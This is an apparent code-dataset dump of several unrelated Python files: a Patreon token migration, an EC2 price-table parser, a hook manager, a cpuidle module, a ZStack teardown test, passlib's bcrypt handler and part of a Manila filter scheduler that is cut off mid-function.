code
stringlengths 1
199k
|
|---|
revision = 'e966a3afd100'
down_revision = '954c3c4caf32'
branch_labels = None
depends_on = None
import alembic
import sqlalchemy
import requests
import pytz
import dateutil.parser
import datetime
def upgrade():
patreon_users = alembic.op.create_table("patreon_users",
sqlalchemy.Column("id", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column("patreon_id", sqlalchemy.Text, unique=True),
sqlalchemy.Column("full_name", sqlalchemy.Text, nullable=False),
sqlalchemy.Column("access_token", sqlalchemy.Text),
sqlalchemy.Column("refresh_token", sqlalchemy.Text),
sqlalchemy.Column("token_expires", sqlalchemy.DateTime(timezone=True)),
sqlalchemy.Column("pledge_start", sqlalchemy.DateTime(timezone=True)),
sqlalchemy.Column("last_announce_month", sqlalchemy.Integer),
)
alembic.op.add_column("users",
sqlalchemy.Column("patreon_user",
sqlalchemy.Integer, sqlalchemy.ForeignKey("patreon_users.id", onupdate="CASCADE", ondelete="SET NULL"),
unique=True,
)
)
# TODO: migrate
conn = alembic.op.get_bind()
meta = sqlalchemy.MetaData(bind=conn)
meta.reflect()
users = meta.tables["users"]
existing_accounts = conn.execute(sqlalchemy.select([users.c.id, users.c.patreon_access_token, users.c.patreon_refresh_token, users.c.patreon_token_expires])
.where(users.c.patreon_access_token.isnot(None)))
all_patreon_users = []
all_users = []
clientid = alembic.context.config.get_section_option('lrrbot', 'patreon_clientid')
clientsecret = alembic.context.config.get_section_option('lrrbot', 'patreon_clientsecret')
with requests.Session() as session:
for user_id, access_token, refresh_token, expires in existing_accounts:
now = datetime.datetime.now(tz=pytz.utc)
if expires < now:
req = session.post("https://api.patreon.com/oauth2/token", data={
'grant_type': 'refresh_token',
'client_id': clientid,
'client_secret': clientsecret,
'refresh_token': refresh_token
})
req.raise_for_status()
data = req.json()
access_token = data["access_token"]
refresh_token = data["refresh_token"]
expires = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=data["expires_in"])
req = session.get("https://api.patreon.com/oauth2/api/current_user", headers={"Authorization": "Bearer %s" % access_token})
req.raise_for_status()
data = req.json()
user = {
"patreon_id": data["data"]["id"],
"full_name": data["data"]["attributes"]["full_name"],
"access_token": access_token,
"refresh_token": refresh_token,
"token_expires": expires,
}
if 'pledges' in data["data"].get("relationships", {}):
for pledge in data["data"]["relationships"]["pledges"]["data"]:
for obj in data["included"]:
if obj["id"] == pledge["id"] and obj["type"] == pledge["type"]:
user["pledge_start"] = dateutil.parser.parse(obj["attributes"]["created_at"])
all_patreon_users.append(user)
all_users.append((user_id, data["data"]["id"]))
alembic.op.bulk_insert(patreon_users, all_patreon_users)
for user_id, patreon_id in all_users:
conn.execute(users.update()
.values(patreon_user=patreon_users.c.id)
.where(users.c.id == user_id)
.where(patreon_users.c.patreon_id == patreon_id)
)
alembic.op.drop_column("users", "patreon_access_token")
alembic.op.drop_column("users", "patreon_refresh_token")
alembic.op.drop_column("users", "patreon_token_expires")
def downgrade():
alembic.op.add_column("users", sqlalchemy.Column("patreon_access_token", sqlalchemy.Text))
alembic.op.add_column("users", sqlalchemy.Column("patreon_refresh_token", sqlalchemy.Text))
alembic.op.add_column("users", sqlalchemy.Column("patreon_token_expires", sqlalchemy.DateTime(timezone=True)))
conn = alembic.op.get_bind()
meta = sqlalchemy.MetaData(bind=conn)
meta.reflect()
users = meta.tables["users"]
patreon_users = meta.tables["patreon_users"]
alembic.op.execute(users.update().where(users.c.patreon_id == patreon_users.c.id)).values({
"patreon_access_token": patreon_users.c.access_token,
"patreon_refresh_token": patreon_users.c.refresh_token,
"patreon_token_expires": patreon_users.c.token_expires,
})
alembic.op.drop_column("users", "patreon_id")
alembic.op.drop_table("patreon_users")
|
import HTMLParser
data = '''
<table cellspacing="0" class="table table-bordered table-hover table-condensed" id="data">
<thead>
<tr>
<th class="name">Name</th>
<th class="memory">Memory</th>
<th class="computeunits">
<abbr title="One EC2 Compute Unit provides the equivalent CPU capacity of a 1.0-1.2 GHz 2007 Opteron or 2007 Xeon processor.">Compute Units</abbr>
</th>
<th class="storage">Storage</th>
<th class="architecture">Architecture</th>
<th class="ioperf">I/O Performance</th>
<th class="maxips">
<abbr title="Adding additional IPs requires launching the instance in a VPC.">Max IPs</abbr>
</th>
<th class="apiname">API Name</th>
<th class="cost">Linux cost</th>
<th class="cost">Windows cost</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name">M1 Small</td>
<td class="memory"><span sort="1.7">1.70 GB</span></td>
<td class="computeunits"><span sort="1">1</span></td>
<td class="storage"><span sort="160">160 GB</span></td>
<td class="architecture">32/64-bit</td>
<td class="ioperf"><span sort="1">Moderate</span></td>
<td class="maxips">8</td>
<td class="apiname">m1.small</td>
<td class="cost" hour_cost="0.060">$0.060 per hour</td>
<td class="cost" hour_cost="0.115">$0.115 per hour</td>
</tr>
<tr>
<td class="name">M1 Medium</td>
<td class="memory"><span sort="3.75">3.75 GB</span></td>
<td class="computeunits"><span sort="2">2</span></td>
<td class="storage"><span sort="410">410 GB</span></td>
<td class="architecture">32/64-bit</td>
<td class="ioperf"><span sort="1">Moderate</span></td>
<td class="maxips">12</td>
<td class="apiname">m1.medium</td>
<td class="cost" hour_cost="0.12">$0.12 per hour</td>
<td class="cost" hour_cost="0.23">$0.23 per hour</td>
</tr>
<tr>
<td class="name">M1 Large</td>
<td class="memory"><span sort="7.5">7.50 GB</span></td>
<td class="computeunits"><span sort="4">4</span></td>
<td class="storage"><span sort="850">850 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="3">High</span></td>
<td class="maxips">30</td>
<td class="apiname">m1.large</td>
<td class="cost" hour_cost="0.24">$0.24 per hour</td>
<td class="cost" hour_cost="0.46">$0.46 per hour</td>
</tr>
<tr>
<td class="name">M1 Extra Large</td>
<td class="memory"><span sort="15">15.00 GB</span></td>
<td class="computeunits"><span sort="8">8</span></td>
<td class="storage"><span sort="1690">1690 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="3">High</span></td>
<td class="maxips">60</td>
<td class="apiname">m1.xlarge</td>
<td class="cost" hour_cost="0.48">$0.48 per hour</td>
<td class="cost" hour_cost="0.92">$0.92 per hour</td>
</tr>
<tr>
<td class="name">Micro</td>
<td class="memory"><span sort="0.6">0.60 GB</span></td>
<td class="computeunits"><span sort="2">2</span></td>
<td class="storage"><span sort="0">0 GB</span></td>
<td class="architecture">32/64-bit</td>
<td class="ioperf"><span sort="0">Low</span></td>
<td class="maxips">1</td>
<td class="apiname">t1.micro</td>
<td class="cost" hour_cost="0.02">$0.02 per hour</td>
<td class="cost" hour_cost="0.02">$0.02 per hour</td>
</tr>
<tr>
<td class="name">High-Memory Extra Large</td>
<td class="memory"><span sort="17.10">17.10 GB</span></td>
<td class="computeunits"><span sort="6.5">6.5</span></td>
<td class="storage"><span sort="420">420 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="1">Moderate</span></td>
<td class="maxips">60</td>
<td class="apiname">m2.xlarge</td>
<td class="cost" hour_cost="0.41">$0.41 per hour</td>
<td class="cost" hour_cost="0.57">$0.57 per hour</td>
</tr>
<tr>
<td class="name">High-Memory Double Extra Large</td>
<td class="memory"><span sort="34.2">34.20 GB</span></td>
<td class="computeunits"><span sort="13">13</span></td>
<td class="storage"><span sort="850">850 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="2">High</span></td>
<td class="maxips">120</td>
<td class="apiname">m2.2xlarge</td>
<td class="cost" hour_cost="0.82">$0.82 per hour</td>
<td class="cost" hour_cost="1.14">$1.14 per hour</td>
</tr>
<tr>
<td class="name">High-Memory Quadruple Extra Large</td>
<td class="memory"><span sort="68.4">68.40 GB</span></td>
<td class="computeunits"><span sort="26">26</span></td>
<td class="storage"><span sort="1690">1690 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="3">High</span></td>
<td class="maxips">240</td>
<td class="apiname">m2.4xlarge</td>
<td class="cost" hour_cost="1.64">$1.64 per hour</td>
<td class="cost" hour_cost="2.28">$2.28 per hour</td>
</tr>
<tr>
<td class="name">M3 Extra Large</td>
<td class="memory"><span sort="15">15.00 GB</span></td>
<td class="computeunits"><span sort="13">13</span></td>
<td class="storage"><span sort="0">0 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="1">Moderate</span></td>
<td class="maxips">60</td>
<td class="apiname">m3.xlarge</td>
<td class="cost" hour_cost="0.50">$0.50 per hour</td>
<td class="cost" hour_cost="0.98">$0.98 per hour</td>
</tr>
<tr>
<td class="name">M3 Double Extra Large</td>
<td class="memory"><span sort="30">30.00 GB</span></td>
<td class="computeunits"><span sort="26">26</span></td>
<td class="storage"><span sort="0">0 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="2">High</span></td>
<td class="maxips">120</td>
<td class="apiname">m3.2xlarge</td>
<td class="cost" hour_cost="1.00">$1.00 per hour</td>
<td class="cost" hour_cost="1.96">$1.96 per hour</td>
</tr>
<tr>
<td class="name">High-CPU Medium</td>
<td class="memory"><span sort="1.7">1.70 GB</span></td>
<td class="computeunits"><span sort="5">5</span></td>
<td class="storage"><span sort="350">350 GB</span></td>
<td class="architecture">32_64-bit</td>
<td class="ioperf"><span sort="1">Moderate</span></td>
<td class="maxips">12</td>
<td class="apiname">c1.medium</td>
<td class="cost" hour_cost="0.145">$0.145 per hour</td>
<td class="cost" hour_cost="0.285">$0.285 per hour</td>
</tr>
<tr>
<td class="name">High-CPU Extra Large</td>
<td class="memory"><span sort="7">7.00 GB</span></td>
<td class="computeunits"><span sort="20">20</span></td>
<td class="storage"><span sort="1690">1690 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="2">High</span></td>
<td class="maxips">60</td>
<td class="apiname">c1.xlarge</td>
<td class="cost" hour_cost="0.58">$0.58 per hour</td>
<td class="cost" hour_cost="1.14">$1.14 per hour</td>
</tr>
<tr>
<td class="name">Cluster Compute Quadruple Extra Large</td>
<td class="memory"><span sort="23">23.00 GB</span></td>
<td class="computeunits"><span sort="33.5">33.5</span></td>
<td class="storage"><span sort="1690">1690 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="4">Very High</sort></td>
<td class="maxips">1</td>
<td class="apiname">cc1.4xlarge</td>
<td class="cost" hour_cost="1.30">$1.30 per hour</td>
<td class="cost" hour_cost="1.61">$1.61 per hour</td>
</tr>
<tr>
<td class="name">Cluster Compute Eight Extra Large</td>
<td class="memory"><span sort="60.5">60.50 GB</span></td>
<td class="computeunits"><span sort="88">88</span></td>
<td class="storage"><span sort="3370">3370 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="4">Very High</sort></td>
<td class="maxips">240</td>
<td class="apiname">cc2.8xlarge</td>
<td class="cost" hour_cost="2.40">$2.40 per hour</td>
<td class="cost" hour_cost="2.97">$2.97 per hour</td>
</tr>
<tr>
<td class="name">Cluster GPU Quadruple Extra Large</td>
<td class="memory"><span sort="22">22.00 GB</span></td>
<td class="computeunits"><span sort="33.5">33.5</span></td>
<td class="storage"><span sort="1690">1690 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="4">Very High</sort></td>
<td class="maxips">1</td>
<td class="apiname">cg1.4xlarge</td>
<td class="cost" hour_cost="2.10">$2.10 per hour</td>
<td class="cost" hour_cost="2.60">$2.60 per hour</td>
</tr>
<tr>
<td class="name">High I/O Quadruple Extra Large</td>
<td class="memory"><span sort="60.5">60.50 GB</span></td>
<td class="computeunits"><span sort="35">35</span></td>
<td class="storage"><span sort="2048">2048 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="4">Very High</sort></td>
<td class="maxips">1</td>
<td class="apiname">hi1.4xlarge</td>
<td class="cost" hour_cost="3.10">$3.10 per hour</td>
<td class="cost" hour_cost="3.58">$3.58 per hour</td>
</tr>
<tr>
<td class="name">High Storage Eight Extra Large</td>
<td class="memory"><span sort="117.00">117.00 GB</span></td>
<td class="computeunits"><span sort="35">35</span></td>
<td class="storage"><span sort="49152">48 TB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="4">Very High</sort></td>
<td class="maxips">1</td>
<td class="apiname">hs1.8xlarge</td>
<td class="cost" hour_cost="4.600">$4.600 per hour</td>
<td class="cost" hour_cost="4.931">$4.931 per hour</td>
</tr>
<tr>
<td class="name">High Memory Cluster Eight Extra Large</td>
<td class="memory"><span sort="244.00">244.00 GB</span></td>
<td class="computeunits"><span sort="88">88</span></td>
<td class="storage"><span sort="240">240 GB</span></td>
<td class="architecture">64-bit</td>
<td class="ioperf"><span sort="4">Very High</sort></td>
<td class="maxips">1</td>
<td class="apiname">cr1.8xlarge</td>
<td class="cost" hour_cost="3.500">$3.500 per hour</td>
<td class="cost" hour_cost="3.831">$3.831 per hour</td>
</tr>
</tbody>
</table> '''
class TableParser(HTMLParser.HTMLParser):
def __init__(self):
HTMLParser.HTMLParser.__init__(self)
self.in_td = False
self.flavors = []
def handle_starttag(self, tag, attrs):
if tag == 'td':
self.in_td = True
def handle_data(self, data):
if self.in_td:
self.flavors.append(data)
def handle_endtag(self, tag):
self.in_td = False
|
import logging
from collections import namedtuple
from see.interfaces import Hook
from see.helpers import lookup_class
HookParameters = namedtuple('HookParameters', ('identifier',
'configuration',
'context'))
def hooks_factory(identifier, configuration, context):
"""
Returns the initialized hooks.
"""
manager = HookManager(identifier, configuration)
manager.load_hooks(context)
return manager
class HookManager(object):
"""
The Hooks Manager takes care the Hooks allocation, configuration
and deallocation.
"""
def __init__(self, identifier, configuration):
self.hooks = []
self.identifier = identifier
self.configuration = configuration
self.logger = logging.getLogger(
'%s.%s' % (self.__module__, self.__class__.__name__))
def load_hooks(self, context):
"""
Initializes the Hooks and loads them within the Environment.
"""
for hook in self.configuration.get('hooks', ()):
config = hook.get('configuration', {})
config.update(self.configuration.get('configuration', {}))
try:
self._load_hook(hook['name'], config, context)
except KeyError:
self.logger.exception('Provided hook has no name: %s.', hook)
def _load_hook(self, name, configuration, context):
self.logger.debug('Loading %s hook.', name)
try:
HookClass = lookup_hook_class(name)
hook = HookClass(HookParameters(self.identifier,
configuration,
context))
self.hooks.append(hook)
except Exception as error:
self.logger.exception('Hook %s initialization failure, error: %s.',
name, error)
def cleanup(self):
for hook in self.hooks:
try:
hook.cleanup()
except NotImplementedError:
pass
except Exception as error:
self.logger.exception('Hook %s cleanup error: %s.',
hook.__class__.__name__, error)
self.hooks = []
def lookup_hook_class(name):
HookClass = lookup_class(name)
if not issubclass(HookClass, Hook):
raise ValueError("%r is not subclass of of %r" % (HookClass, Hook))
else:
return HookClass
|
import wlauto.core.signal as signal
from wlauto import Module
from wlauto.exceptions import DeviceError
class CpuidleState(object):
@property
def usage(self):
return self.get('usage')
@property
def time(self):
return self.get('time')
@property
def disable(self):
return self.get('disable')
@disable.setter
def disable(self, value):
self.set('disable', value)
@property
def ordinal(self):
i = len(self.id)
while self.id[i - 1].isdigit():
i -= 1
if not i:
raise ValueError('invalid idle state name: "{}"'.format(self.id))
return int(self.id[i:])
def __init__(self, device, path):
self.device = device
self.path = path
self.id = self.device.path.basename(self.path)
self.cpu = self.device.path.basename(self.device.path.dirname(path))
self.desc = self.get('desc')
self.name = self.get('name')
self.latency = self.get('latency')
self.power = self.get('power')
def get(self, prop):
property_path = self.device.path.join(self.path, prop)
return self.device.get_sysfile_value(property_path)
def set(self, prop, value):
property_path = self.device.path.join(self.path, prop)
self.device.set_sysfile_value(property_path, value)
def __eq__(self, other):
if isinstance(other, CpuidleState):
return (self.name == other.name) and (self.desc == other.desc)
elif isinstance(other, basestring):
return (self.name == other) or (self.desc == other)
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
class Cpuidle(Module):
name = 'cpuidle'
description = """
Adds cpuidle state query and manupution APIs to a Device interface.
"""
capabilities = ['cpuidle']
root_path = '/sys/devices/system/cpu/cpuidle'
def probe(self, device):
return device.file_exists(self.root_path)
def initialize(self, context):
self.device = self.root_owner
signal.connect(self._on_device_init, signal.RUN_INIT, priority=1)
def get_cpuidle_driver(self):
return self.device.get_sysfile_value(self.device.path.join(self.root_path, 'current_driver')).strip()
def get_cpuidle_governor(self):
return self.device.get_sysfile_value(self.device.path.join(self.root_path, 'current_governor_ro')).strip()
def get_cpuidle_states(self, cpu=0):
if isinstance(cpu, int):
cpu = 'cpu{}'.format(cpu)
states_dir = self.device.path.join(self.device.path.dirname(self.root_path), cpu, 'cpuidle')
idle_states = []
for state in self.device.listdir(states_dir):
if state.startswith('state'):
idle_states.append(CpuidleState(self.device, self.device.path.join(states_dir, state)))
return idle_states
def _on_device_init(self, context): # pylint: disable=unused-argument
if not self.device.file_exists(self.root_path):
raise DeviceError('Device kernel does not appear to have cpuidle enabled.')
|
'''
Integration Test Teardown case
@author: Youyk
'''
import zstacklib.utils.linux as linux
import zstacklib.utils.http as http
import zstackwoodpecker.setup_actions as setup_actions
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.clean_util as clean_util
import zstackwoodpecker.test_lib as test_lib
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
def test():
clean_util.cleanup_all_vms_violently()
clean_util.cleanup_none_vm_volumes_violently()
clean_util.umount_all_primary_storages_violently()
clean_util.cleanup_backup_storage()
#linux.remove_vlan_eth("eth0", 10)
#linux.remove_vlan_eth("eth0", 11)
cmd = host_plugin.DeleteVlanDeviceCmd()
cmd.vlan_ethname = 'eth0.10'
hosts = test_lib.lib_get_all_hosts_from_plan()
if type(hosts) != type([]):
hosts = [hosts]
for host in hosts:
http.json_dump_post(testagent.build_http_path(host.managementIp_, host_plugin.DELETE_VLAN_DEVICE_PATH), cmd)
cmd.vlan_ethname = 'eth0.11'
for host in hosts:
http.json_dump_post(testagent.build_http_path(host.managementIp_, host_plugin.DELETE_VLAN_DEVICE_PATH), cmd)
test_lib.setup_plan.stop_node()
test_lib.lib_cleanup_host_ip_dict()
test_util.test_pass('VPC Teardown Success')
|
"""passlib.bcrypt -- implementation of OpenBSD's BCrypt algorithm.
TODO:
* support 2x and altered-2a hashes?
http://www.openwall.com/lists/oss-security/2011/06/27/9
* deal with lack of PY3-compatibile c-ext implementation
"""
from __future__ import with_statement, absolute_import
import os
import re
import logging; log = logging.getLogger(__name__)
from warnings import warn
try:
from bcrypt import hashpw as pybcrypt_hashpw
except ImportError: # pragma: no cover
pybcrypt_hashpw = None
try:
from bcryptor.engine import Engine as bcryptor_engine
except ImportError: # pragma: no cover
bcryptor_engine = None
from passlib.exc import PasslibHashWarning
from passlib.utils import bcrypt64, safe_crypt, repeat_string, \
classproperty, rng, getrandstr, test_crypt
from passlib.utils.compat import bytes, b, u, uascii_to_str, unicode, str_to_uascii
import passlib.utils.handlers as uh
__all__ = [
"bcrypt",
]
_builtin_bcrypt = None
def _load_builtin():
global _builtin_bcrypt
if _builtin_bcrypt is None:
from passlib.utils._blowfish import raw_bcrypt as _builtin_bcrypt
IDENT_2 = u("$2$")
IDENT_2A = u("$2a$")
IDENT_2X = u("$2x$")
IDENT_2Y = u("$2y$")
_BNULL = b('\x00')
class bcrypt(uh.HasManyIdents, uh.HasRounds, uh.HasSalt, uh.HasManyBackends, uh.GenericHandler):
"""This class implements the BCrypt password hash, and follows the :ref:`password-hash-api`.
It supports a fixed-length salt, and a variable number of rounds.
The :meth:`~passlib.ifc.PasswordHash.encrypt` and :meth:`~passlib.ifc.PasswordHash.genconfig` methods accept the following optional keywords:
:type salt: str
:param salt:
Optional salt string.
If not specified, one will be autogenerated (this is recommended).
If specified, it must be 22 characters, drawn from the regexp range ``[./0-9A-Za-z]``.
:type rounds: int
:param rounds:
Optional number of rounds to use.
Defaults to 12, must be between 4 and 31, inclusive.
This value is logarithmic, the actual number of iterations used will be :samp:`2**{rounds}`
-- increasing the rounds by +1 will double the amount of time taken.
:type ident: str
:param ident:
Specifies which version of the BCrypt algorithm will be used when creating a new hash.
Typically this option is not needed, as the default (``"2a"``) is usually the correct choice.
If specified, it must be one of the following:
* ``"2"`` - the first revision of BCrypt, which suffers from a minor security flaw and is generally not used anymore.
* ``"2a"`` - latest revision of the official BCrypt algorithm, and the current default.
* ``"2y"`` - format specific to the *crypt_blowfish* BCrypt implementation,
identical to ``"2a"`` in all but name.
:type relaxed: bool
:param relaxed:
By default, providing an invalid value for one of the other
keywords will result in a :exc:`ValueError`. If ``relaxed=True``,
and the error can be corrected, a :exc:`~passlib.exc.PasslibHashWarning`
will be issued instead. Correctable errors include ``rounds``
that are too small or too large, and ``salt`` strings that are too long.
.. versionadded:: 1.6
.. versionchanged:: 1.6
This class now supports ``"2y"`` hashes, and recognizes
(but does not support) the broken ``"2x"`` hashes.
(see the :ref:`crypt_blowfish bug <crypt-blowfish-bug>`
for details).
.. versionchanged:: 1.6
Added a pure-python backend.
"""
#===================================================================
# class attrs
#===================================================================
#--GenericHandler--
name = "bcrypt"
setting_kwds = ("salt", "rounds", "ident")
checksum_size = 31
checksum_chars = bcrypt64.charmap
#--HasManyIdents--
default_ident = u("$2a$")
ident_values = (u("$2$"), IDENT_2A, IDENT_2X, IDENT_2Y)
ident_aliases = {u("2"): u("$2$"), u("2a"): IDENT_2A, u("2y"): IDENT_2Y}
#--HasSalt--
min_salt_size = max_salt_size = 22
salt_chars = bcrypt64.charmap
# NOTE: 22nd salt char must be in bcrypt64._padinfo2[1], not full charmap
#--HasRounds--
default_rounds = 12 # current passlib default
min_rounds = 4 # bcrypt spec specified minimum
max_rounds = 31 # 32-bit integer limit (since real_rounds=1<<rounds)
rounds_cost = "log2"
#===================================================================
# formatting
#===================================================================
@classmethod
def from_string(cls, hash):
ident, tail = cls._parse_ident(hash)
if ident == IDENT_2X:
raise ValueError("crypt_blowfish's buggy '2x' hashes are not "
"currently supported")
rounds_str, data = tail.split(u("$"))
rounds = int(rounds_str)
if rounds_str != u('%02d') % (rounds,):
raise uh.exc.MalformedHashError(cls, "malformed cost field")
salt, chk = data[:22], data[22:]
return cls(
rounds=rounds,
salt=salt,
checksum=chk or None,
ident=ident,
)
def to_string(self):
hash = u("%s%02d$%s%s") % (self.ident, self.rounds, self.salt,
self.checksum or u(''))
return uascii_to_str(hash)
def _get_config(self, ident=None):
"internal helper to prepare config string for backends"
if ident is None:
ident = self.ident
if ident == IDENT_2Y:
ident = IDENT_2A
else:
assert ident != IDENT_2X
config = u("%s%02d$%s") % (ident, self.rounds, self.salt)
return uascii_to_str(config)
#===================================================================
# specialized salt generation - fixes passlib issue 25
#===================================================================
@classmethod
def _bind_needs_update(cls, **settings):
return cls._needs_update
@classmethod
def _needs_update(cls, hash, secret):
if isinstance(hash, bytes):
hash = hash.decode("ascii")
# check for incorrect padding bits (passlib issue 25)
if hash.startswith(IDENT_2A) and hash[28] not in bcrypt64._padinfo2[1]:
return True
# TODO: try to detect incorrect $2x$ hashes using *secret*
return False
@classmethod
def normhash(cls, hash):
"helper to normalize hash, correcting any bcrypt padding bits"
if cls.identify(hash):
return cls.from_string(hash).to_string()
else:
return hash
def _generate_salt(self, salt_size):
# override to correct generate salt bits
salt = super(bcrypt, self)._generate_salt(salt_size)
return bcrypt64.repair_unused(salt)
def _norm_salt(self, salt, **kwds):
salt = super(bcrypt, self)._norm_salt(salt, **kwds)
assert salt is not None, "HasSalt didn't generate new salt!"
changed, salt = bcrypt64.check_repair_unused(salt)
if changed:
# FIXME: if salt was provided by user, this message won't be
# correct. not sure if we want to throw error, or use different warning.
warn(
"encountered a bcrypt salt with incorrectly set padding bits; "
"you may want to use bcrypt.normhash() "
"to fix this; see Passlib 1.5.3 changelog.",
PasslibHashWarning)
return salt
def _norm_checksum(self, checksum):
checksum = super(bcrypt, self)._norm_checksum(checksum)
if not checksum:
return None
changed, checksum = bcrypt64.check_repair_unused(checksum)
if changed:
warn(
"encountered a bcrypt hash with incorrectly set padding bits; "
"you may want to use bcrypt.normhash() "
"to fix this; see Passlib 1.5.3 changelog.",
PasslibHashWarning)
return checksum
#===================================================================
# primary interface
#===================================================================
backends = ("pybcrypt", "bcryptor", "os_crypt", "builtin")
@classproperty
def _has_backend_pybcrypt(cls):
return pybcrypt_hashpw is not None
@classproperty
def _has_backend_bcryptor(cls):
return bcryptor_engine is not None
@classproperty
def _has_backend_builtin(cls):
if os.environ.get("PASSLIB_BUILTIN_BCRYPT") not in ["enable","enabled"]:
return False
# look at it cross-eyed, and it loads itself
_load_builtin()
return True
@classproperty
def _has_backend_os_crypt(cls):
# XXX: what to do if only h2 is supported? h1 is *very* rare.
h1 = '$2$04$......................1O4gOrCYaqBG3o/4LnT2ykQUt1wbyju'
h2 = '$2a$04$......................qiOQjkB8hxU8OzRhS.GhRMa4VUnkPty'
return test_crypt("test",h1) and test_crypt("test", h2)
@classmethod
def _no_backends_msg(cls):
return "no bcrypt backends available - please install py-bcrypt"
def _calc_checksum_os_crypt(self, secret):
config = self._get_config()
hash = safe_crypt(secret, config)
if hash:
assert hash.startswith(config) and len(hash) == len(config)+31
return hash[-31:]
else:
# NOTE: it's unlikely any other backend will be available,
# but checking before we bail, just in case.
for name in self.backends:
if name != "os_crypt" and self.has_backend(name):
func = getattr(self, "_calc_checksum_" + name)
return func(secret)
raise uh.exc.MissingBackendError(
"password can't be handled by os_crypt, "
"recommend installing py-bcrypt.",
)
def _calc_checksum_pybcrypt(self, secret):
# py-bcrypt behavior:
# py2: unicode secret/hash encoded as ascii bytes before use,
# bytes taken as-is; returns ascii bytes.
# py3: not supported (patch submitted)
if isinstance(secret, unicode):
secret = secret.encode("utf-8")
if _BNULL in secret:
raise uh.exc.NullPasswordError(self)
config = self._get_config()
hash = pybcrypt_hashpw(secret, config)
assert hash.startswith(config) and len(hash) == len(config)+31
return str_to_uascii(hash[-31:])
def _calc_checksum_bcryptor(self, secret):
# bcryptor behavior:
# py2: unicode secret/hash encoded as ascii bytes before use,
# bytes taken as-is; returns ascii bytes.
# py3: not supported
if isinstance(secret, unicode):
secret = secret.encode("utf-8")
if _BNULL in secret:
# NOTE: especially important to forbid NULLs for bcryptor,
# since it happily accepts them, and then silently truncates
# the password at first one it encounters :(
raise uh.exc.NullPasswordError(self)
if self.ident == IDENT_2:
# bcryptor doesn't support $2$ hashes; but we can fake $2$ behavior
# using the $2a$ algorithm, by repeating the password until
# it's at least 72 chars in length.
if secret:
secret = repeat_string(secret, 72)
config = self._get_config(IDENT_2A)
else:
config = self._get_config()
hash = bcryptor_engine(False).hash_key(secret, config)
assert hash.startswith(config) and len(hash) == len(config)+31
return str_to_uascii(hash[-31:])
def _calc_checksum_builtin(self, secret):
if isinstance(secret, unicode):
secret = secret.encode("utf-8")
if _BNULL in secret:
raise uh.exc.NullPasswordError(self)
chk = _builtin_bcrypt(secret, self.ident.strip("$"),
self.salt.encode("ascii"), self.rounds)
return chk.decode("ascii")
#===================================================================
# eoc
#===================================================================
|
"""
The FilterScheduler is for creating shares.
You can customize this scheduler by specifying your own share Filters and
Weighing Functions.
"""
import operator
from manila import exception
from manila.openstack.common import importutils
from manila.openstack.common import log as logging
from manila.scheduler import driver
from manila.scheduler import scheduler_options
from oslo.config import cfg
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class FilterScheduler(driver.Scheduler):
"""Scheduler that can be used for filtering and weighing."""
def __init__(self, *args, **kwargs):
super(FilterScheduler, self).__init__(*args, **kwargs)
self.cost_function_cache = None
self.options = scheduler_options.SchedulerOptions()
self.max_attempts = self._max_attempts()
def schedule(self, context, topic, method, *args, **kwargs):
"""The schedule() contract requires we return the one
best-suited host for this request.
"""
self._schedule(context, topic, *args, **kwargs)
def _get_configuration_options(self):
"""Fetch options dictionary. Broken out for testing."""
return self.options.get_configuration()
def _post_select_populate_filter_properties(self, filter_properties,
host_state):
"""Add additional information to the filter properties after a host has
been selected by the scheduling process.
"""
# Add a retry entry for the selected volume backend:
self._add_retry_host(filter_properties, host_state.host)
def _add_retry_host(self, filter_properties, host):
"""Add a retry entry for the selected volume backend. In the event that
the request gets re-scheduled, this entry will signal that the given
backend has already been tried.
"""
retry = filter_properties.get('retry', None)
if not retry:
return
hosts = retry['hosts']
hosts.append(host)
def _max_attempts(self):
max_attempts = CONF.scheduler_max_attempts
if max_attempts < 1:
msg = _("Invalid value for 'scheduler_max_attempts', "
"must be >=1")
raise exception.InvalidParameterValue(err=msg)
return max_attempts
def schedule_create_share(self, context, request_spec, filter_properties):
weighed_host = self._schedule_share(context,
request_spec,
filter_properties)
if not weighed_host:
raise exception.NoValidHost(reason="")
host = weighed_host.obj.host
share_id = request_spec['share_id']
snapshot_id = request_spec['snapshot_id']
updated_share = driver.share_update_db(context, share_id, host)
self._post_select_populate_filter_properties(filter_properties,
weighed_host.obj)
# context is not serializable
filter_properties.pop('context', None)
self.share_rpcapi.create_share(context, updated_share, host,
request_spec=request_spec,
filter_properties=filter_properties,
snapshot_id=snapshot_id)
def _schedule_share(self, context, request_spec, filter_properties=None):
"""Returns a list of hosts that meet the required specs,
ordered by their fitness.
"""
elevated = context.elevated()
share_properties = request_spec['share_properties']
# Since Manila is using mixed filters from Oslo and it's own, which
# takes 'resource_XX' and 'volume_XX' as input respectively, copying
# 'volume_XX' to 'resource_XX' will make both filters happy.
resource_properties = share_properties.copy()
share_type = request_spec.get("share_type", {})
resource_type = request_spec.get("share_type", {})
request_spec.update({'resource_properties': resource_properties})
config_options = self._get_configuration_options()
if filter_properties is None:
filter_properties = {}
self._populate_retry_share(filter_properties, resource_properties)
filter_properties.update({'context': context,
'request_spec': request_spec,
'config_options': config_options,
'share_type': share_type,
'resource_type': resource_type
})
self.populate_filter_properties_share(request_spec, filter_properties)
# Find our local list of acceptable hosts by filtering and
# weighing our options. we virtually consume resources on
# it so subsequent selections can adjust accordingly.
